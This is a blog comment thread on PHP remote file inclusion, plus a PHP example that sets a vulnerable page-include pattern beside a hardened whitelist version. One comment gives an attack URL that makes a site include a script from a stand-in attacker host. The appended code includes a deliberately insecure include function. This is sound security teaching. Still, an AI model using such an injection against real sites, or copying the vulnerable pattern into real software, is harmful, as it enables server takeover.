Technosailor: Lessons in Web Security: PHP and Remote File Execution

  • Matt Thornton · 4 years ago
    Ah yes open_basedir(), figured you'd mention that. Nice idea to use file_exists to check a file before including it. I s'pose there's lots of stuff you could do, like checking the $_SERVER["DOCUMENT_ROOT"] or the HOSTNAME to check the file is coming from itself.

    Are you gonna do anything on FTP security? Not being much of a security buff myself, but thinking about it, were someone able to gain FTP access (don't know but with register_globals on, could you pass a system command through a $_GET equiv, or guest accounts/public_ftp etc.) then they could upload whatever they wanted and have away with your system.

    And you might want to mention for the more n00b programmers out there to give all includes a .php extension (and not a .inc, for example ;) :p).

    Matt
  • Aaron · 4 years ago
    Hey Matt,

    Checking $_SERVER['DOCUMENT_ROOT'] will not work because that global variable will be set according to the page doing the including, not the remote file itself. And yes, FTP will be a topic. :)
  • Robert Mathews · 4 years ago
    Here's a simple example of why allow_url_fopen is a problem in the real world.

    I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:

    And then they run it with something like "http://www.example.com/index.php?page=page5.html".

    All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.

    Moral: allow_url_fopen should *always* be off unless you need it.

    Rob
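The header/page/footer pattern Rob describes, shown in its vulnerable form beside a hardened version that treats the URL parameter as a key into a fixed list rather than as a path. This is an added example, not code from the original post or any commenter; the `PAGES` map, `resolve_page`, `render_hardened` and the `pages/` directory are assumed names.

```php
<?php
// Added example (not from the original post or comments).
// Assumed layout: the page files live in ./pages/ next to this script.

// --- Vulnerable pattern from the comment above: the URL parameter is included as-is.
// With allow_url_fopen (and allow_url_include) on, ?page=http://... is fetched and executed;
// even with them off, the include path is still whatever the visitor typed.
function render_vulnerable(string $page): void
{
    include 'header.php';
    include $page;          // attacker-controlled path
    include 'footer.php';
}

// --- Hardened version: the parameter selects an entry in a fixed map, never a path.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $key, string $pagesDir): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null;                                // unknown key: refuse
    }
    $base = realpath($pagesDir);
    $path = realpath($pagesDir . DIRECTORY_SEPARATOR . PAGES[$key]);
    // Defence in depth: the resolved file must exist and sit inside $pagesDir,
    // so a misconfigured map entry cannot point outside the directory.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function render_hardened(string $key): void
{
    $path = resolve_page($key, __DIR__ . '/pages');
    if ($path === null) {
        http_response_code(404);
        echo 'Page not found';
        return;
    }
    include 'header.php';
    include $path;          // always a local file from the fixed map
    include 'footer.php';
}

// ?page=about selects PAGES['about']; ?page=http://evildoer.com/evilscript.txt is rejected.
render_hardened($_GET['page'] ?? 'home');
```

Keeping allow_url_fopen and allow_url_include off in php.ini still matters; the map removes the dependence on that setting for this script.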